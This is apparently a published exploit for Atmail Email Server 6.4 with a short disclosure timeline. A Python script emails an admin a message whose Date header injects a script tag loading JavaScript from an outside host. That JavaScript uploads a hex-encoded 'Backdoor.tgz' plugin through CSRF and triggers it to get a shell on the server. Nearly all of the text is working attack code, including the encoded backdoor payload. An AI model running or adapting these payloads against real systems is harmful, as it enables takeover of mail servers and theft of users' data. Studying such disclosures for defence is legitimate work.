######################################################################################
# Exploit Title: Atmail Email Server Appliance 6.4 Remote Code Execution
# Date: Jul 21 2012
# Author: muts
# Version: Atmail Email Server 6.4
#
# By sending an email to a user with the Atmail administrative interface open, we
# can call a remote JavaScript file that will initiate the installation of a 
# specially crafted plugin file via CSRF, enabling remote code execution on the 
# Atmail server.
#
######################################################################################

Timeline:

29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
21 Jul 2012: Public Disclosure

#!/usr/bin/python
import smtplib, urllib2, sys

def sendMail(dstemail, frmemail, smtpsrv, username, password):
	msg  = "From: admin@offsec.localn"
	msg += "To: admin@offsec.localn"
	msg += 'Date: <script src="http://172.16.164.1/~awae/atmail-rce.js"></script>n'
	msg += "Subject: You haz been pwndn"
	msg += "Content-type: text/htmlnn"
	msg += "Oh noez, you been had."
	msg += 'rnrn'
	server = smtplib.SMTP(smtpsrv)
	server.login(username,password)
	try:
		server.sendmail(frmemail, dstemail, msg)
	except Exception, e:
		print "[-] Failed to send email:"
		print "[*] " + str(e)
	server.quit()

username = "admin@offsec.local"
password = "123456"
dstemail = "admin@offsec.local"
frmemail = "admin@offsec.local"
smtpsrv  = "172.16.164.147"

if not (dstemail and frmemail and smtpsrv):
   sys.exit()

sendMail(dstemail, frmemail, smtpsrv, username, password)


#############################################################################################################


function timeMsg()
{
	var t=setTimeout("getShell()",5000);
}

function getShell()
{
	var b64url ="http://172.16.164.130/index.php/admin/plugins/add/file/QmFja2Rvb3IudGd6";
 	xhr = new XMLHttpRequest();
	xhr.open("GET", b64url, true);
	xhr.send(null);

}
function fileUpload(url, fileData, fileName, nameVar, ctype) {

   var fileSize = fileData.length,
   boundary = "OWNEDBYOFFSEC",
   xhr = new XMLHttpRequest();
   xhr.open("POST", url, true);
   //  MIME POST request.
   xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
   xhr.setRequestHeader("Content-Length", fileSize);
   var body = "--" + boundary + "rn";
   body += 'Content-Disposition: form-data; name="' + nameVar +'"; filename="' + fileName + '"rn';
   body += "Content-Type: " + ctype + "rnrn";
   body += fileData + "rn";
   body += "--" + boundary + "--";

   //xhr.send(body);
   xhr.sendAsBinary(body);
   return true;
}

var nameVar  = "newPlugin";
var fileName = "Backdoor.tgz";
var url      = "http://172.16.164.130/index.php/admin/plugins/preinstall";
var ctype    = "application/x-gzip";
//var ctype    = "application/octet-stream";
//var data     = "x44x41x42x43x44";
var data     = 'x1Fx8Bx08x00x44x7Ax91x4Fx00x03xEDx59xEDx72xDBxC6' +
'x15x55x3BxD3xE9x88xFFxDBxDFx1Bx8DxA6x22x27x24x48' +
'xF0xD3x96x2Ax27x34x2DxD9x9CxC8x92x86x94xE2x7Ax9A' +
'x0Ex67x05x2Cx49x8Cx40x00xC6x02xA2x99xD4xEFxD1xD7' +
'xE8x33xF5x45x7AxEEx2Ex40x91x16x4Dx53x89x46x69x63' +
'xDCx89x4Cx12xB8x7BxF7xE2xDCxAFxB3x88x51x36x06x67' +
'xC3xA1xF0xA4x73x23xFAxC2x8Ax43x27x9Ax6Dx3DxACx54' +
'x2Ax95x56xA3xC1xD4x67x53x7Fx56xAAx75xFDx49x52xAB' +
'xD7x98x69xB6xEAxF5x6AxABx61x56x4Cx56x31x1Bx66xB3' +
'xB5xC5x2Ax0FxECxC7x4Ax89x65xC4x43xB8x32x89x23xB9' +
'x4Ex0Fx6AxC3xE1x9AxFBxFAx51xD8xFCxF3xFFx45xFExF0' +
'xE7x3Fx6ExFDx7Ex6BxEBx35xB7xD8x59x9FxFDx8Dx25x42' +
'xD7xB6xB6xF1x57xC5xDFxBFxF1x47xBFxFFxB3x99xC9xF6' +
'xC5x45x2FxF9x4Ax2BxFEx85xBFxEFx3Ex52xF9xDDxEDxF5' +
'x3Fx59xFExC4xE0x41xE0x0AxE3x5DxCCx43xEEx45x8Ex27' +
'xB6xDEx95x81xA2x79x50x1Fx3Ex35x1Bx95xE6xD3x83xFE' +
'xF5x2Cx10x07xB5x17x4Fx6Bx4FxDBx95x4ExA9xF2xE2x69' +
'xA7x54x6Fx77x9Ex97x9Ex3Cx7DxF2xBCx74xD4x79x7Ex7C' +
'xDCx32x6Bx95xBAx79xF4x4FxB2x27x49x5DxFFxFBx00x18' +
'xFDx86xE5x4ExEDx97x1Fx7Ex8FxCFxD5x3FxD5xCBx72xFD' +
'xD7x9Bx54xFFx8Dx87x77xE5xAEx7CxE1xF5x7Fx37xFExC6' +
'xE0x39xB7xAEx6DxDFx0Fx1Fx6Ax8Fx7BxF4xFFx7AxB3x45' +
'xF1x6Fx36x5Ax66xD6xFFx1Fx45xB2xFExFFx45xCBxDDxFA' +
'x4FxABxFFxE1x06xC1x3DxFAx7Fx5AxFFxF5x6Ax33xEBxFF' +
'x8Fx21x6BxE2x6Fx0Cx1CxCFx72x63x5BxACxC5x65x03xB9' +
'x4FxFFx6Fx55x6AxACx52xADxD4x5AxB5xACxFFx3Fx8Ax64' +
'xFDxFFx8Bx96x35xF5x9Fx56xFFx2Fx1Ex04xF7xE9xFFx49' +
'xFDx57x6Bx95xACxFFx3Fx86xACxEDxFFxE7x6Ex3Cx72x3C' +
'x23x18x07xBFx68x0FxE0xD1xACxD7x37x7BxFFx53x69xA8' +
'xF8x37x2Bx8DxACxFFx3Fx8Ax64xFDxFFx8Bx96x35xF5xFF' +
'x40xD5xFFxD9xFAx37x1BxD5xD6xC7xF5x5Fx6Bx65xF5xFF' +
'x28xF2xD7x6Fx10xDFx9CxE5x72x29xD9x9Dx5Cx98xBFx09' +
'x4Ax26x01x13xEFx23xE1xD9x92xB5xA3x09x77xDCx41xC7' +
'xF7xA2xD0x77x5Dx91x2AxE4x7ExCAx6Dx07xA1x1Fx09x2B' +
'x12x36xDBx1Dx04xEAxEAx71xECxBAxA7x7Cx22xB6xB7x0F' +
'xD9x5Ex6Ax72xEFx60x95x6AxC7x9Fx04xDCx9Bx29xCDx3B' +
'xEExACx5ExD2x8ExA3xB1x1Fx2ExAFx60xE9x12xE6x78x43' +
'xFFx5Bx3FxBDx5Ex92xC9x75x03x4DxE2x53x1Ex04xB3xD0' +
'x19x8Dx23x65x91xB2x82x96x63xDDxA7x97x5Cx86xEExB6' +
'xD2x9Ex4ExA7xC6x7DxF6x3AxC5x05xA9x97xAEx56xF8x5E' +
'x84xD2xF1x3DxA5x51x31x2Ax86xB9x5AxEDxB5x6FxC7xAE' +
'x86x97xE2xB2x06x5AxFDx54x4DxC3x34x9Ax8CxFEx6Dx91' +
'x2ExB4xE3x2BxD7xB1xD8x30xF6xACx08xFBxB1xC1xC0xF2' +
'x3Dx19x85xB1x15xE5x0BxB9x6Dx44x75x3BxE0xA1xF0xA2' +
'xFDxFDxA5x5Bx58xBCxBDx1Bx8Dx1Dx59x7Ax96xECxF2x42' +
'x48x2Bx74x02x65xE5x90xEDxBCxE2xA1x6DxF9x36xDCx40' +
'x9Ax95x26xBEx77x2Dx66x2Cx14x37x78x2ExC1xE4x58xB8' +
'x2Ex22x24x1Dx5Bx7CxB5x03x5Bx1Fx56xF9x22x45x14x07' +
'xA9x17x6AxC9x40xBCx17x56x7Ex0Fx16x59x39x96x61xD9' +
'xF5x2DxEEx96xB9xCAxC9xF2x54x5CxA9x4Fx9Ax28x8ExC5' +
'xC9x44x79xA2xF0x91x65x75x43xFBx29xCBx9Bx30x5Fx72' +
'x3AxF1xB6xA4xB6xA6x6ExC8x9ExB1xB2x2Dx6ExCAx1ExD2' +
'x9Ax55x9FxDDx7ExFFxCBx1Ex01xF2x61x3BxF7x21xF7x6B' +
'x97xF5xC6xB2x09x0AxC6x60x25x0Ex1BxEFxB1x39xFFxAB' +
'xB7xEAxB5x26xFAx7FxBDx41xEFx7FxB2xFExFFx08x92xF1' +
'xBFx2Fx5Ax7Ex76x17xBCxC7x1ExEBxEBxDFxACx36x9AxAD' +
'x8FxEBxBFx56xADx67xF5xFFx18xA2xF9x5FxB9xCCxEEx04' +
'x99x95x58x9BxF5x92x51xDDxD7xA3x7Ax82x2Ax9Dx80x06' +
'xA8xB1x8AxC9xCDxCEx5Fx9DxD3xE2x39x69x62xF9x4Ex81' +
'x55x11x67x16x40x4DxC8x48x8FxFCx6Fx97x7Ex19x9Ex88' +
'xB0x8Ax16x5Ex80x3BxB0xC8xF7x5Dx36xE1x33x76x25x58' +
'x2CxC1x15x86x7ExC8x5Cx31xE2x2Ex0BxE2x30xF0xA5x90' +
'xCCxF7xDCx99xC1xD8xA5x84x3Bx2CxE2xD7x02x04x01x1E' +
'x85x42x06xA0x23xCEx95xE3x22x77xC9x22xADx05x83x64' +
'x5CxB1x07x09x3Fx42x5Cx9AxC0x6Ax2Cx1Dx6FxC4xA2x74' +
'x47x58xBBx18x0BxC6x15x7Dx84xBAx25x82x48x32xCFx67' +
'xAExC3x97xCDxD9x7CxC2x47x82x59x5Cx39x77x35x5BxB2' +
'xD1x1DxE2xA7x00x44x91x08x27x92x81x25xC1x46x94xD8' +
'xE3x57x2Ex6ExF8x6CxE6xC7x45x52xF3xC8xA4xEDx2Bx8D' +
'x98xD6xCCx0Dx25x78x74x3DxC6xF1x58x3Ex74x43xF5x70' +
'xE0x70x92x56xB2x97xE7x27xECx46xD3x41x56x65x8AxDD' +
'x08xB9xBFx08x23x28xDFx28xE4x13x86xAFxC3x50x80x5E' +
'xF9xC3x68x0Ax7Fx0Ex68x7Bx78xEFxC1xA0xEDx80xBAx39' +
'x57x71x24x98x03x27x3DxBBx8CxE7x03x3Dx72x86xEAx69' +
'x71x2DxF6x6Cx6Cx4Dx3BxEAx07xF2x87x7AxFBxD3x4BxF6' +
'x52x78x22x44x50xCEx35x43x3Bx71x2CxB4x0ExB1xE8x95' +
'x54x99x44xB7x91x42x09x54x82x1Dx93x37xFDxC4x1Bx76' +
'xECx63x0Bx95x40xC6x27xBCxBFx75xD2xA6x1Cx23x13x63' +
'x3Fx20xB4x78x44x2Ex4Ex1Dx40xA4x73x05x49x50x24x13' +
'x50x66x6FxBAx17xAFxCEx2Ex2Fx58xFBxF4x2Dx7BxD3xEE' +
'xF5xDAxA7x17x6Fx0FxA0x8CxF8xE2x2Ex12x59x9BxA2x24' +
'x76x60x19xCExD0xB0x99xE1x09xC9xC2xEBxA3x5ExE7x15' +
'x96xB4x9Fx77x4FxBAx17x6Fx19x70x39xEEx5Ex9Cx1ExF5' +
'xFBxECxF8xACx87x52x38x6FxF7x2ExBAx9DxCBx93x76x8F' +
'x9Dx5FxF6xCExCFxFAx47x88x7Ex5Fx90x5Bx82x0CxACx41' +
'x68xA8x40xC6xB3xDBx22x02x05x95xE9x83xBFx45x5Cx24' +
'xBCx73x6Dx36xE6x38xB5x84xC2x12x68xC5x36xE3xCCx42' +
'x45x6Dx80x3Dx77x7Dx6Fx44xA6xE8x31x75x3Ax25x40x1E' +
'x30x67x48x79x56x64x53xB4x75x95x85xEBx62x51x44xEA' +
'x59x86xC2xB2x61x42x8Bx7BxD7x2ExB0xEFx47xD0x87x8D' +
'x63x67x08xFBxC7x2ExE6x42x91x3DxF7x65x44x2Bx5ExB7' +
'xD1xAAx4DxB3x52xC2xE0x35xD9x65xBFx6DxFCx4Fx54xF5' +
'x26x15x49x36xE7x45xB9xB6x22x29x46x64x42x78x96x1F' +
'x87xE8x03x36x41x29x71x0Cx46x8Cx26xD4x0Cx65x91x72' +
'x2AxF4x6Fx54x6Bx94x94x39x32x1Ex8DxD0xEEx94xABx7A' +
'xB3x09x62x15x6DxD8x14x17xCEx50xF4xB3x74x2Bx73x70' +
'xB5x82xAEx84x09xE1x86xEAx46x96x5Fx51x3CxD9x45xE7' +
'x1CxBEx79x9ExD0x07x28xB8xCBx91x5FxE9x41xACx7Bx4E' +
'x75xCFx02x3Fx8Cx0Cx6Dx4Fx25x9Ex13x38x70x67x5Ex5B' +
'x23x87xEAx85x27x67xB4x30xF6x3Cx82x99xEBx5Ex04xA6' +
'x40x87x41x02x2Cx64x79x1Ex70x6Bx4Cx18x87x13xF4xAE' +
'x59x21x45xEExC4x99x38x7Ax52xC8x15x8Fx01xC0xACx01' +
'xAAxDAx53xDExA0xE0x05x9Fx0Cx70xD6x1Bx5CxE1x38x77' +
'x4Dx9Bx85xE2x5DxECx00x79xCCx98x79x8FxA9x1BxB5xAF' +
'x8Bx84x70xE3x6Bx32x82xC4xA1x22x99xAFx76x05x9Dx4A' +
'x91x56x6CxE8xB8x54x6Ex1Ax27x1FxD9x15xE2x18x19x7A' +
'xBAx29xCDxF7x86xAEx7AxE0x21xAAx52xF9xA1xB5xD8x71' +
'xFBxA4x7Fx94xB4xC2x37x8Ex67xFBx53x55xB3x28x1CxC4' +
'x11x61x0Fx60xBDx14x39xF8xE1x07x3AxCAx2AxCBx84xB0' +
'x93x3CxB7xB9x40x58x1DxA9x07x65xDEx75x10xA2xC0xF2' +
'x22xB7x08xE0xA5xF3xBExA0xA7x0Fx55x30x16x86xF8xC7' +
'x45x72xDFxC0x0Dx4AxD0x14xC1x4Bx89x7Cx9Bx63xA7x1C' +
'x40xF5x8ExA3x28xD8x2Fx97xEFx64x4Fx99xD2x76x05x5B' +
'xA3x46x40x13x60x24x22x20x15x5BxD7x46x2Ex47x40x93' +
'xFFx03x97x82xC4xF2x15x9Cx5Cx77xBFx3FxEAxF5xBBx67' +
'xA7x74x6Ex37x8Dx0Ax0ExE4xBBx4Ex80x1Fx7Bx66xABx6A' +
'x98x4DxE3xC9x13xC3xACxD5xF7x0Ex18xA3x89x8Fx5ExF9' +
'xF2x88x5DxBCxEAxF6x73xBBx94x4Bx50x34xABxB5xFAx41' +
'x72x7ExF8x58xC5x1AxC7xDExF5x40x3Ax3Fx0Ax52xACx57' +
'x2AxB0xAEx1AxD3x80xE3x02x1Dx9Fx71x41x84xA1x1Fx2E' +
'x5ExD0xFExC3x85xD8xE3x00xBBxC4xD1xCFxD1xD8xECx03' +
'x56xBEx72xBCxB2x1CxB3x92xB3x07x3Dx0Dx37x14xC9xAC' +
'x2DxAExE2x91xFEx9Ex16x54x12x0Dx84x2Bx06x2CxEEx90' +
'x20x41x1CxD0x61xF4x7CxE6x37xBEx63xB3x1FxFDxC9x15' +
'x86x2Ax73x39x3Ax07x2Dx55x79x4Ax51x1Bx20xA6xD7x34' +
'x9AxA8x8Cx10x29x82xF7x36x5Cx45x35x7Ex54x22xA1x00' +
'xFCx29xEAx82x8CxA6x39xA0x22x88x8Dx89x62xA9xD4x13' +
'x52xAAx64x5BxDAx15x09xF1x06x30x8Ex51x73x51x38x33' +
'x0Cx23x07x1FxF3xE9x5Bx90x81x78x8FxA1x28xF3x7BxB7' +
'xEExECx15x0AxECxA7xDCx36x6Cx1Fx93x73x64x50x0Dx11' +
'x2Ax50xFDxB2x66xBEx19x16x47xB9xEDxDDx00xBBx1Dx2E' +
'x3Cx90x7Ax7Fx93xDBxA6x7DxF4xBDx43x56x32x95xD1xED' +
'x20x74x70x0Ex8BxF2x3Bx47xBDxDEx59x6Fx9Fx75xB8xB7' +
'x17x51x66x5FxEFxA8x97x3Ex64x31x6Fx16xD2x77x36xA9' +
'x09xBDx58xDDx44x46xA9x2Cx38xD7xAExD0x35x49xDAxCA' +
'xE3xD7xD4xB2x16x3BxC9x1Cx16x74x56xA9x2AxDDx15x1C' +
'xD5xA7xB4xDFx10xB2x34x2AxD0x57xD1xC4x89x15x0CxD9' +
'x54x8DxD5x6Bx61xEBxDDx55x55x51xFFx90x8Ex8DxAAx5E' +
'xF9x28x94x5DxE9xA3xA4x9Ax77x1Fx07x40xCDxD3xC9x3C' +
'xC8x7Dx60xC2x45xE2xA8x17x9Bx89x21x90x8BxD3xEExE9' +
'xCBx7Dx76x8Cx04xD0xF3x60x1Ex6Bx55xD7x48x14xFCx87' +
'xEEx15xA9x6Ex41xB6x28x3Cx34x63x86x3CxE2xAEx41xBB' +
'x7Ex50xE9xD5x19x73x6FxA4x73x90x49x3Ex44xCFx42xCB' +
'xB3xD0xB1x66x39x6Bx8CxEFxF9x9Dx32x29x93x6Ax0Fx5B' +
'xDCx08x35x06xE3x09x97xD7x04x81xE3x81x28x62x1Bx3B' +
'xA7x2ExA9x3Ax4Ex93x5Ex0FxFCxA5x97x6Dx94x56x49x5E' +
'x9Fx51xEBx4Dx6FxDEx4Ex0BxD4x1CxDAx2Fx1Ex7Dx48x9F' +
'xAAx47xA2x0Bx14x99xAAx71x7CxA0x44x3Dx5Fx7FxA2xEB' +
'x16x59x8Dx76xA4x00x7CxA5x16x16x96x80x4AxB4x90x1B' +
'x6Ax99x06x7Bx8ExB5x06xA0x1FxF0xA9x97x8Cx99x24x0B' +
'xA8x84xE7x8Dx1Bx0Cx18xDEx10x57x9BxE5x73x68x2Cx15' +
'x76xF8x2CxF9xB9x13x38x81xD8x29xB2x9Dx70xA7x50x54' +
'xC9x26x23x1BxA4xC5xA1x3CxA2x7Bx9Ax31xAAx3Cx1Bx3B' +
'x20x59xAAx44x31x2AxD0xA3x43x7Fx42xD6xCCx15xD6xA6' +
'x0BxD6x88x39xAEx37x97xB2x2BxB2x56x5Dx6Dx8DxA5xD6' +
'x80xC2xA6xD6x28x8ExBBx69x55x1Cx2Ex4Cx2CxDDx13x11' +
'x81x65x8Cx28x42x30x2Ax69x9Dx0Ax87x23x07xA0x51x68' +
'x3Bx96xC8xA7x86x0AxCBxE1x59xAAx6Dx79x1Bx87x95x61' +
'x12x8Ax42x87x33x10x24xE2x5BxC4x98xBCx52x3AxABx75' +
'x7Ax72xE9x7BxFBxECxCCxB2xA8x80x89x0Ax28xACx65xC2' +
'x29x48xB5x98xD2x70x3Fx1Ex8Dx97xC7x36xD8x9AxEBx4A' +
'xD5x3AxC7x62xC6xA6x3Ex9CxCAxADxA0x05x79xFDx9Cx7F' +
'xAFxFCxA3xC8x28xF7xD6xA8x98x9Fx57xA9xAEx53x91xCA' +
'x63x55x52x73xCCxFAxD4x81xA4x24x9Ax0Ax7Ex8Ex80x08' +
'xFBxA3xF7xD9x80x06x15xB3xAFx0Ax46x95xEEx74x4Cx5C' +
'x24x6FxA6xEDxBAx33x16xA8x30x62x09x44x22x41x5Fx96' +
'xF9x9AxEEx67x43xE1x0FxB5x07x85xD5x1Dx59x9FxC8x17' +
'x69x1ExD8xAExE3x61x74xD9xBAxA7x5DxE1x89xAEx0FxE6' +
'x2DxF7xCExAExFDx8Bx17x38x2Dx2DxEEx96xA2xB6x76xC7' +
'x34x27x3FxB3xDDx1BxAExCEx92x11xF1x2AxD5x03xA9x01' +
'x22xF7x69x73xD0x29x8Fx25xE8x12x59x06xA9x52x6Bx52' +
'x35x14x5Dx90xD4x5Dx3Ax62x89xD2x69x87x69x05xBExC1' +
'x27x34x6AxCAx2FxC5x17x74xD1x25x36x17xC2x3Fx0Fx33' +
'xF9xB8xEBxC5x93x81xA5x1AxAEx3Dx20x55xCCx00xACx5D' +
'x66x8Fx89x4Dx2Cx4DxE8x89x6Ex76xC4x4Bx8Ax8Ax96x50' +
'x48xC9xDBxAEx9Ax41xFAx58x9Dx74x14x55xCDx14x4Dx6D' +
'xBCxA8x8Ex09x4Ax19x87x2Cx4Ex99x91xA0xB7x27xE9x19' +
'xBAxA7x1Ax7DxC7x1Bx2CxFBxAFx5Dx48xC2xA0x66xABxE2' +
'x34x05x76x9Bx86x67x9DxEFx58xEFxA8xFDx42x83xBFxEB' +
'x78x84xD8x21x1DxFCxB9x3DxB7x73x4BxBAx94xD6x27x2D' +
'xEDx33x6Dx40x1Bx1BxAAx07x5FxACx33x7DxB7x70x1BxDD' +
'x4Fx3DxFBxD2xE3xA9xECxA2xC6xA7x62x4Ex00xA8xC0x47' +
'x56x70x27xDBx6Fx11x58x08xDDx06x28xE8x8CxF8x34x0E' +
'x0BxD6x36xC2x42xD9x5Bx8Dx46x02xE9xCFx42x42x25xEB' +
'xCFx43xA2xBAx31x12xD8xE4xB3x48x54xEFx81x04xECx6D' +
'x8Ax04xB0x18x5Ax2Ex4ExF4x49xC7x3Ax98xFFx4Cx73xE8' +
'xCEx25xF3xEEx25x55xA4x6AxD0xA5x97x93xA9xA5xE9xCF' +
'x89x3Ax43x91x83x9Ax6FxDBxBExA0xD7x75x7Ax1Ex29x42' +
'xB8x07x76x34x27x62x76xCAxF5x69x6DxBEx4Bx21x22x06' +
'xEBx8CxE2x90x8Ex01x11x1Bx83xA8xA3x22xE9x9Dx18x31' +
'xAExB4xBDxA8xA3x1AxA7xF8x05x22x3DxC7x15x72xF3xFF' +
'x1Bx99x20x04xC8xE8x1Dx95x37x52x31xD1xFCx27xD1xBD' +
'xEDx9Dx6Cx27x51xFAxC1xDBx49x71xFAxE6x19xCBx41x7E' +
'xEDxD7xBEx99x64x92x49x26x99x64x92x49x26x99x64x92' +
'x49x26x99x64x92x49x26x99x64x92x49x26x99x64x92xC9' +
'x6Fx58xFEx0Bx3ExE1xD0x84x00x50x00x00';

// UPLOAD THE THINGIE...
fileUpload(url,data,fileName,nameVar,ctype);
timeMsg();